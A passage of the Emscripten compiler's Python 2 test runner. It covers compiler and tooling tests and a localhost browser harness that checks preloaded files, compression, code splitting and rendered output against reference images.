Popen([PYTHON, EMCC, path_from_root('tests', 'embind', 'embind_test.cpp'), '--post-js', path_from_root('tests', 'embind', 'underscore-1.4.2.js'), '--post-js', path_from_root('tests', 'embind', 'imvu_test_adapter.js'), '--post-js', path_from_root('tests', 'embind', 'embind.test.js')] + args, stderr=PIPE if fail else None).communicate()
assert os.path.exists(self.in_dir('a.out.js')) == (not fail)
if not fail:
output = run_js(self.in_dir('a.out.js'), stdout=PIPE, stderr=PIPE, full_output=True)
assert "FAIL" not in output, output
def test_llvm_nativizer(self):
try:
Popen(['as', '--version'], stdout=PIPE, stderr=PIPE).communicate()
except:
return self.skip('no gnu as, cannot run nativizer')
# avoid impure_ptr problems etc.
shutil.copyfile(path_from_root('tests', 'files.cpp'), os.path.join(self.get_dir(), 'files.cpp'))
open(os.path.join(self.get_dir(), 'somefile.binary'), 'w').write('''waka waka############################''')
open(os.path.join(self.get_dir(), 'test.file'), 'w').write('''ay file..............,,,,,,,,,,,,,,''')
open(os.path.join(self.get_dir(), 'stdin'), 'w').write('''inter-active''')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'files.cpp'), '-c']).communicate()
Popen([PYTHON, path_from_root('tools', 'nativize_llvm.py'), os.path.join(self.get_dir(), 'files.o')]).communicate(input)[0]
output = Popen([os.path.join(self.get_dir(), 'files.o.run')], stdin=open(os.path.join(self.get_dir(), 'stdin')), stdout=PIPE, stderr=PIPE).communicate()
self.assertContained('''size: 37
data: 119,97,107,97,32,119,97,107,97,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35
loop: 119 97 107 97 32 119 97 107 97 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35
input:inter-active
texto
$
5 : 10,30,20,11,88
other=ay file...
seeked= file.
''', output[0])
self.assertIdentical('texte\n', output[1])
def test_emconfig(self):
output = Popen([PYTHON, EMCONFIG, 'LLVM_ROOT'], stdout=PIPE, stderr=PIPE).communicate()[0].strip()
try:
assert output == LLVM_ROOT
except:
print >> sys.stderr, 'Assertion failed: python %s LLVM_ROOT returned "%s" instead of expected "%s"!' % (EMCONFIG, output, LLVM_ROOT)
raise
invalid = 'Usage: em-config VAR_NAME'
# Don't accept variables that do not exist
output = Popen([PYTHON, EMCONFIG, 'VAR_WHICH_DOES_NOT_EXIST'], stdout=PIPE, stderr=PIPE).communicate()[0].strip()
assert output == invalid
# Don't accept no arguments
output = Popen([PYTHON, EMCONFIG], stdout=PIPE, stderr=PIPE).communicate()[0].strip()
assert output == invalid
# Don't accept more than one variable
output = Popen([PYTHON, EMCONFIG, 'LLVM_ROOT', 'EMCC'], stdout=PIPE, stderr=PIPE).communicate()[0].strip()
assert output == invalid
# Don't accept arbitrary python code
output = Popen([PYTHON, EMCONFIG, 'sys.argv[1]'], stdout=PIPE, stderr=PIPE).communicate()[0].strip()
assert output == invalid
def test_link_s(self):
# -s OPT=VALUE can conflict with -s as a linker option. We warn and ignore
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(r'''
extern "C" {
void something();
}
int main() {
something();
return 0;
}
''')
open(os.path.join(self.get_dir(), 'supp.cpp'), 'w').write(r'''
#include <stdio.h>
extern "C" {
void something() {
printf("yello\n");
}
}
''')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '-o', 'main.o']).communicate()
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'supp.cpp'), '-o', 'supp.o']).communicate()
output = Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.o'), '-s', os.path.join(self.get_dir(), 'supp.o'), '-s', 'SAFE_HEAP=1'], stderr=PIPE).communicate()
self.assertContained('treating -s as linker option', output[1])
output = run_js('a.out.js')
assert 'yello' in output, 'code works'
code = open('a.out.js').read()
assert 'SAFE_HEAP' in code, 'valid -s option had an effect'
def test_jcache_printf(self):
open(self.in_dir('src.cpp'), 'w').write(r'''
#include <stdio.h>
#include <stdint.h>
#include <emscripten.h>
int main() {
emscripten_jcache_printf("hello world\n");
emscripten_jcache_printf("hello %d world\n", 5);
emscripten_jcache_printf("hello %.3f world\n", 123.456789123);
emscripten_jcache_printf("hello %llx world\n", 0x1234567811223344ULL);
return 0;
}
''')
Popen([PYTHON, EMCC, self.in_dir('src.cpp')]).communicate()
output = run_js('a.out.js')
self.assertIdentical('hello world\nhello 5 world\nhello 123.457 world\nhello 1234567811223300 world\n', output)
def test_conftest_s_flag_passing(self):
open(os.path.join(self.get_dir(), 'conftest.c'), 'w').write(r'''
int main() {
return 0;
}
''')
os.environ["EMMAKEN_JUST_CONFIGURE"] = "1"
cmd = [PYTHON, EMCC, '-s', 'ASSERTIONS=1', os.path.join(self.get_dir(), 'conftest.c'), '-o', 'conftest']
output = Popen(cmd, stderr=PIPE).communicate()
del os.environ["EMMAKEN_JUST_CONFIGURE"]
self.assertNotContained('emcc: warning: treating -s as linker option', output[1])
assert os.path.exists('conftest')
def test_crunch(self):
# crunch should not be run if a .crn exists that is more recent than the .dds
shutil.copyfile(path_from_root('tests', 'ship.dds'), 'ship.dds')
time.sleep(0.1)
Popen([PYTHON, FILE_PACKAGER, 'test.data', '--pre-run', '--crunch=32', '--preload', 'ship.dds'], stdout=open('pre.js', 'w')).communicate()
assert os.stat('test.data').st_size < 0.25*os.stat('ship.dds').st_size, 'Compressed should be much smaller than dds'
crunch_time = os.stat('ship.crn').st_mtime
dds_time = os.stat('ship.dds').st_mtime
assert crunch_time > dds_time, 'Crunch is more recent'
# run again, should not recrunch!
time.sleep(0.1)
Popen([PYTHON, FILE_PACKAGER, 'test.data', '--pre-run', '--crunch=32', '--preload', 'ship.dds'], stdout=open('pre.js', 'w')).communicate()
assert crunch_time == os.stat('ship.crn').st_mtime, 'Crunch is unchanged'
# update dds, so should recrunch
time.sleep(0.1)
os.utime('ship.dds', None)
Popen([PYTHON, FILE_PACKAGER, 'test.data', '--pre-run', '--crunch=32', '--preload', 'ship.dds'], stdout=open('pre.js', 'w')).communicate()
assert crunch_time < os.stat('ship.crn').st_mtime, 'Crunch was changed'
def test_headless(self):
if SPIDERMONKEY_ENGINE not in JS_ENGINES: return self.skip('cannot run without spidermonkey due to node limitations (Uint8ClampedArray etc.)')
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'example.png'))
Popen([PYTHON, EMCC, path_from_root('tests', 'sdl_canvas.c'), '-s', 'HEADLESS=1']).communicate()
output = run_js('a.out.js', engine=SPIDERMONKEY_ENGINE, stderr=PIPE)
assert '''Init: 0
Font: 0x1
Sum: 0
you should see two lines of text in different colors and a blue rectangle
SDL_Quit called (and ignored)
done.
''' in output, output
elif 'browser' in str(sys.argv):
# Browser tests.
''' Enable this code to run in another browser than webbrowser detects as default
def run_in_other_browser(url):
execute(['yourbrowser', url])
webbrowser.open_new = run_in_other_browser
'''
print
print 'Running the browser tests. Make sure the browser allows popups from localhost.'
print
# Run a server and a web page. When a test runs, we tell the server about it,
# which tells the web page, which then opens a window with the test. Doing
# it this way then allows the page to close() itself when done.
def harness_server_func(q):
class TestServerHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(s):
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
if s.path == '/run_harness':
s.wfile.write(open(path_from_root('tests', 'browser_harness.html')).read())
else:
result = 'False'
if not q.empty():
result = q.get()
s.wfile.write(result)
s.wfile.close()
def log_request(code=0, size=0):
# don't log; too noisy
pass
httpd = BaseHTTPServer.HTTPServer(('localhost', 9999), TestServerHandler)
httpd.serve_forever() # test runner will kill us
def server_func(dir, q):
class TestServerHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(s):
if 'report_' in s.path:
q.put(s.path)
else:
filename = s.path[1:]
if os.path.exists(filename):
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(open(filename).read())
s.wfile.close()
else:
s.send_response(500)
s.send_header("Content-type", "text/html")
s.end_headers()
def log_request(code=0, size=0):
# don't log; too noisy
pass
os.chdir(dir)
httpd = BaseHTTPServer.HTTPServer(('localhost', 8888), TestServerHandler)
httpd.serve_forever() # test runner will kill us
class browser(RunnerCore):
def __init__(self, *args, **kwargs):
super(browser, self).__init__(*args, **kwargs)
if hasattr(browser, 'harness_server'): return
browser.harness_queue = multiprocessing.Queue()
browser.harness_server = multiprocessing.Process(target=harness_server_func, args=(browser.harness_queue,))
browser.harness_server.start()
print '[Browser harness server on process %d]' % browser.harness_server.pid
webbrowser.open_new('http://localhost:9999/run_harness')
@classmethod
def tearDownClass(cls):
if not hasattr(browser, 'harness_server'): return
browser.harness_server.terminate()
delattr(browser, 'harness_server')
print '[Browser harness server terminated]'
# On Windows, shutil.rmtree() in tearDown() raises this exception if we do not wait a bit:
# WindowsError: [Error 32] The process cannot access the file because it is being used by another process.
time.sleep(0.1)
def run_browser(self, html_file, message, expectedResult=None):
if expectedResult is not None:
try:
queue = multiprocessing.Queue()
server = multiprocessing.Process(target=functools.partial(server_func, self.get_dir()), args=(queue,))
server.start()
browser.harness_queue.put('http://localhost:8888/' + html_file)
output = '[no http server activity]'
start = time.time()
while time.time() - start < 60:
if not queue.empty():
output = queue.get()
break
time.sleep(0.1)
self.assertIdentical(expectedResult, output)
finally:
server.terminate()
time.sleep(0.1) # see comment about Windows above
else:
webbrowser.open_new(os.path.abspath(html_file))
print 'A web browser window should have opened a page containing the results of a part of this test.'
print 'You need to manually look at the page to see that it works ok: ' + message
print '(sleeping for a bit to keep the directory alive for the web browser..)'
time.sleep(5)
print '(moving on..)'
def with_report_result(self, code):
return r'''
#if EMSCRIPTEN
#include <emscripten.h>
#define REPORT_RESULT_INTERNAL(sync) \
char output[1000]; \
sprintf(output, \
"xhr = new XMLHttpRequest();" \
"xhr.open('GET', 'http://localhost:8888/report_result?%d'%s);" \
"xhr.send();", result, sync ? ", false" : ""); \
emscripten_run_script(output); \
emscripten_run_script("setTimeout(function() { window.close() }, 1000)"); // comment this out to keep the test runner window open to debug
#define REPORT_RESULT() REPORT_RESULT_INTERNAL(0)
#endif
''' + code
def reftest(self, expected):
basename = os.path.basename(expected)
shutil.copyfile(expected, os.path.join(self.get_dir(), basename))
open(os.path.join(self.get_dir(), 'reftest.js'), 'w').write('''
function doReftest() {
if (doReftest.done) return;
doReftest.done = true;
var img = new Image();
img.onload = function() {
assert(img.width == Module.canvas.width, 'Invalid width: ' + Module.canvas.width + ', should be ' + img.width);
assert(img.height == Module.canvas.height, 'Invalid height: ' + Module.canvas.height + ', should be ' + img.height);
var canvas = document.createElement('canvas');
canvas.width = img.width;
canvas.height = img.height;
var ctx = canvas.getContext('2d');
ctx.drawImage(img, 0, 0);
var expected = ctx.getImageData(0, 0, img.width, img.height).data;
var actualUrl = Module.canvas.toDataURL();
var actualImage = new Image();
actualImage.onload = function() {
var actualCanvas = document.createElement('canvas');
actualCanvas.width = actualImage.width;
actualCanvas.height = actualImage.height;
var actualCtx = actualCanvas.getContext('2d');
actualCtx.drawImage(actualImage, 0, 0);
var actual = actualCtx.getImageData(0, 0, actualImage.width, actualImage.height).data;
var total = 0;
var width = img.width;
var height = img.height;
for (var x = 0; x < width; x++) {
for (var y = 0; y < height; y++) {
total += Math.abs(expected[y*width*4 + x*4 + 0] - actual[y*width*4 + x*4 + 0]);
total += Math.abs(expected[y*width*4 + x*4 + 1] - actual[y*width*4 + x*4 + 1]);
total += Math.abs(expected[y*width*4 + x*4 + 2] - actual[y*width*4 + x*4 + 2]);
}
}
var wrong = Math.floor(total / (img.width*img.height*3)); // floor, to allow some margin of error for antialiasing
xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + wrong);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
actualImage.src = actualUrl;
}
img.src = '%s';
};
Module['postRun'] = doReftest;
Module['preRun'].push(function() {
setTimeout(doReftest, 1000); // if run() throws an exception and postRun is not called, this will kick in
});
''' % basename)
def test_html(self):
# test HTML generation.
self.btest('hello_world_sdl.cpp', reference='htmltest.png',
message='You should see "hello, world!" and a colored cube.')
def test_html_source_map(self):
if 'test_html_source_map' not in str(sys.argv): return self.skip('''This test
requires manual intervention; will not be run unless explicitly requested''')
cpp_file = os.path.join(self.get_dir(), 'src.cpp')
html_file = os.path.join(self.get_dir(), 'src.html')
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'src.html', '-g4'],
cwd=self.get_dir()).communicate()
webbrowser.open_new('file://' + html_file)
print '''
Set the debugger to pause on exceptions
You should see an exception thrown at src.cpp:7.
Press any key to continue.'''
raw_input()
def build_native_lzma(self):
lzma_native = path_from_root('third_party', 'lzma.js', 'lzma-native')
if os.path.isfile(lzma_native) and os.access(lzma_native, os.X_OK): return
cwd = os.getcwd()
try:
os.chdir(path_from_root('third_party', 'lzma.js'))
Popen(['sh', './doit.sh']).communicate()
finally:
os.chdir(cwd)
def test_split(self):
# test HTML generation.
self.reftest(path_from_root('tests', 'htmltest.png'))
output = Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_sdl.cpp'), '-o', 'something.js', '--split', '100', '--pre-js', 'reftest.js']).communicate()
assert os.path.exists(os.path.join(self.get_dir(), 'something.js')), 'must be main js file'
assert os.path.exists(os.path.join(self.get_dir(), 'something_functions.js')), 'must be functions js file'
assert os.path.exists(os.path.join(self.get_dir(), 'something.include.html')), 'must be js include file'
open(os.path.join(self.get_dir(), 'something.html'), 'w').write('''
<!doctype html>
<html lang="en-us">
<head>
<meta charset="utf-8">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Emscripten-Generated Code</title>
<style>
.emscripten { padding-right: 0; margin-left: auto; margin-right: auto; display: block; }
canvas.emscripten { border: 1px solid black; }
textarea.emscripten { font-family: monospace; width: 80%; }
div.emscripten { text-align: center; }
</style>
</head>
<body>
<hr/>
<div class="emscripten" id="status">Downloading...</div>
<div class="emscripten">
<progress value="0" max="100" id="progress" hidden=1></progress>
</div>
<canvas class="emscripten" id="canvas" oncontextmenu="event.preventDefault()"></canvas>
<hr/>
<div class="emscripten"><input type="button" value="fullscreen" onclick="Module.requestFullScreen()"></div>
<hr/>
<textarea class="emscripten" id="output" rows="8"></textarea>
<hr>
<script type='text/javascript'>
// connect to canvas
var Module = {
preRun: [],
postRun: [],
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
// These replacements are necessary if you render to raw HTML
//text = text.replace(/&/g, "&");
//text = text.replace(/</g, "<");
//text = text.replace(/>/g, ">");
//text = text.replace('\\n', '<br>', 'g');
element.value += text + "\\n";
element.scrollTop = 99999; // focus on bottom
};
})(),
printErr: function(text) {
if (0) { // XXX disabled for safety typeof dump == 'function') {
dump(text + '\\n'); // fast, straight to the real console
} else {
console.log(text);
}
},
canvas: document.getElementById('canvas'),
setStatus: function(text) {
if (Module.setStatus.interval) clearInterval(Module.setStatus.interval);
var m = text.match(/([^(]+)\((\d+(\.\d+)?)\/(\d+)\)/);
var statusElement = document.getElementById('status');
var progressElement = document.getElementById('progress');
if (m) {
text = m[1];
progressElement.value = parseInt(m[2])*100;
progressElement.max = parseInt(m[4])*100;
progressElement.hidden = false;
} else {
progressElement.value = null;
progressElement.max = null;
progressElement.hidden = true;
}
statusElement.innerHTML = text;
},
totalDependencies: 0,
monitorRunDependencies: function(left) {
this.totalDependencies = Math.max(this.totalDependencies, left);
Module.setStatus(left ? 'Preparing... (' + (this.totalDependencies-left) + '/' + this.totalDependencies + ')' : 'All downloads complete.');
}
};
Module.setStatus('Downloading...');
</script>''' + open(os.path.join(self.get_dir(), 'something.include.html')).read() + '''
</body>
</html>
''')
self.run_browser('something.html', 'You should see "hello, world!" and a colored cube.', '/report_result?0')
def test_split_in_source_filenames(self):
self.reftest(path_from_root('tests', 'htmltest.png'))
output = Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_sdl.cpp'), '-o', 'something.js', '-g', '--split', '100', '--pre-js', 'reftest.js']).communicate()
assert os.path.exists(os.path.join(self.get_dir(), 'something.js')), 'must be main js file'
assert os.path.exists(self.get_dir() + '/something/' + path_from_root('tests', 'hello_world_sdl.cpp.js')), 'must be functions js file'
assert os.path.exists(os.path.join(self.get_dir(), 'something.include.html')), 'must be js include file'
open(os.path.join(self.get_dir(), 'something.html'), 'w').write('''
<!doctype html>
<html lang="en-us">
<head>
<meta charset="utf-8">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Emscripten-Generated Code</title>
<style>
.emscripten { padding-right: 0; margin-left: auto; margin-right: auto; display: block; }
canvas.emscripten { border: 1px solid black; }
textarea.emscripten { font-family: monospace; width: 80%; }
div.emscripten { text-align: center; }
</style>
</head>
<body>
<hr/>
<div class="emscripten" id="status">Downloading...</div>
<div class="emscripten">
<progress value="0" max="100" id="progress" hidden=1></progress>
</div>
<canvas class="emscripten" id="canvas" oncontextmenu="event.preventDefault()"></canvas>
<hr/>
<div class="emscripten"><input type="button" value="fullscreen" onclick="Module.requestFullScreen()"></div>
<hr/>
<textarea class="emscripten" id="output" rows="8"></textarea>
<hr>
<script type='text/javascript'>
// connect to canvas
var Module = {
preRun: [],
postRun: [],
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
// These replacements are necessary if you render to raw HTML
//text = text.replace(/&/g, "&");
//text = text.replace(/</g, "<");
//text = text.replace(/>/g, ">");
//text = text.replace('\\n', '<br>', 'g');
element.value += text + "\\n";
element.scrollTop = 99999; // focus on bottom
};
})(),
printErr: function(text) {
if (0) { // XXX disabled for safety typeof dump == 'function') {
dump(text + '\\n'); // fast, straight to the real console
} else {
console.log(text);
}
},
canvas: document.getElementById('canvas'),
setStatus: function(text) {
if (Module.setStatus.interval) clearInterval(Module.setStatus.interval);
var m = text.match(/([^(]+)\((\d+(\.\d+)?)\/(\d+)\)/);
var statusElement = document.getElementById('status');
var progressElement = document.getElementById('progress');
if (m) {
text = m[1];
progressElement.value = parseInt(m[2])*100;
progressElement.max = parseInt(m[4])*100;
progressElement.hidden = false;
} else {
progressElement.value = null;
progressElement.max = null;
progressElement.hidden = true;
}
statusElement.innerHTML = text;
},
totalDependencies: 0,
monitorRunDependencies: function(left) {
this.totalDependencies = Math.max(this.totalDependencies, left);
Module.setStatus(left ? 'Preparing... (' + (this.totalDependencies-left) + '/' + this.totalDependencies + ')' : 'All downloads complete.');
}
};
Module.setStatus('Downloading...');
</script>''' + open(os.path.join(self.get_dir(), 'something.include.html')).read() + '''
</body>
</html>
''')
self.run_browser('something.html', 'You should see "hello, world!" and a colored cube.', '/report_result?0')
def test_compression(self):
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
printf("hello compressed world\n");
int result = 1;
REPORT_RESULT();
return 0;
}
'''))
self.build_native_lzma()
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '-o', 'page.html',
'--compression', '%s,%s,%s' % (path_from_root('third_party', 'lzma.js', 'lzma-native'),
path_from_root('third_party', 'lzma.js', 'lzma-decoder.js'),
'LZMA.decompress')]).communicate()
assert os.path.exists(os.path.join(self.get_dir(), 'page.js')), 'must be side js'
assert os.path.exists(os.path.join(self.get_dir(), 'page.js.compress')), 'must be side compressed js'
assert os.stat(os.path.join(self.get_dir(), 'page.js')).st_size > os.stat(os.path.join(self.get_dir(), 'page.js.compress')).st_size, 'compressed file must be smaller'
shutil.move(os.path.join(self.get_dir(), 'page.js'), 'page.js.renamedsoitcannotbefound');
self.run_browser('page.html', '', '/report_result?1')
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
def make_main(path):
print path
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT();
return 0;
}
''' % path))
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt")]
for test in test_cases:
(srcpath, dstpath) = test
make_main(dstpath)
print srcpath
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', srcpath, '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main(absolute_src_path)
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', absolute_src_path, '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset1/').replace('\\', '/'))
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset1/.git').replace('\\', '/')) # Test adding directory that shouldn't exist.
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset2/').replace('\\', '/'))
open(os.path.join(self.get_dir(), 'assets/sub/asset1/file1.txt'), 'w').write('''load me right before running the code please''')
open(os.path.join(self.get_dir(), 'assets/sub/asset1/.git/shouldnt_be_embedded.txt'), 'w').write('''this file should not get embedded''')
open(os.path.join(self.get_dir(), 'assets/sub/asset2/file2.txt'), 'w').write('''load me right before running the code please''')
absolute_assets_src_path = os.path.join(self.get_dir(), 'assets').replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT();
return 0;
}
''' % (path1, path2, nonexistingpath)))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print srcpath
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', srcpath, '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main(absolute_src_path)
try:
os.mkdir(os.path.join(self.get_dir(), 'dirrey'))
except:
pass
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', absolute_src_path, '-o', 'dirrey/page.html']).communicate()
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false);
};
''')
make_main('someotherfile.txt')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--pre-js', 'pre.js', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
def test_preload_caching(self):
open(os.path.join(self.get_dir(), 'somefile.txt'), 'w').write('''load me right before running the code please''')
def make_main(path):
print path
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT();
return 0;
}
''' % path))
open(os.path.join(self.get_dir(), 'test.js'), 'w').write('''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--use-preload-cache', '--js-library', os.path.join(self.get_dir(), 'test.js'), '--preload-file', 'somefile.txt', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
# a few files inside a directory
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'subdirr'));
os.makedirs(os.path.join(self.get_dir(), 'subdirr', 'moar'));
open(os.path.join(self.get_dir(), 'subdirr', 'data1.txt'), 'w').write('''1214141516171819''')
open(os.path.join(self.get_dir(), 'subdirr', 'moar', 'data2.txt'), 'w').write('''3.14159265358979''')
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT();
return 0;
}
'''))
# by individual files
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove files to make sure
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', 'subdirr', '-o', 'page.html']).communicate()
shutil.rmtree(os.path.join(self.get_dir(), 'subdirr'))
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_compressed_file(self):
open(os.path.join(self.get_dir(), 'datafile.txt'), 'w').write('compress this please' + (2000*'.'))
open(os.path.join(self.get_dir(), 'datafile2.txt'), 'w').write('moar' + (100*'!'))
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[21];
FILE *f = fopen("datafile.txt", "r");
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("file says: |%s|\n", buf);
int result = !strcmp("compress this please", buf);
FILE *f2 = fopen("datafile2.txt", "r");
fread(buf, 1, 5, f2);
buf[5] = 0;
fclose(f2);
result = result && !strcmp("moar!", buf);
printf("file 2 says: |%s|\n", buf);
REPORT_RESULT();
return 0;
}
'''))
self.build_native_lzma()
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '-o', 'page.html', '--preload-file', 'datafile.txt', '--preload-file', 'datafile2.txt',
'--compression', '%s,%s,%s' % (path_from_root('third_party', 'lzma.js', 'lzma-native'),
path_from_root('third_party', 'lzma.js', 'lzma-decoder.js'),
'LZMA.decompress')]).communicate()
assert os.path.exists(os.path.join(self.get_dir(), 'datafile.txt')), 'must be data file'
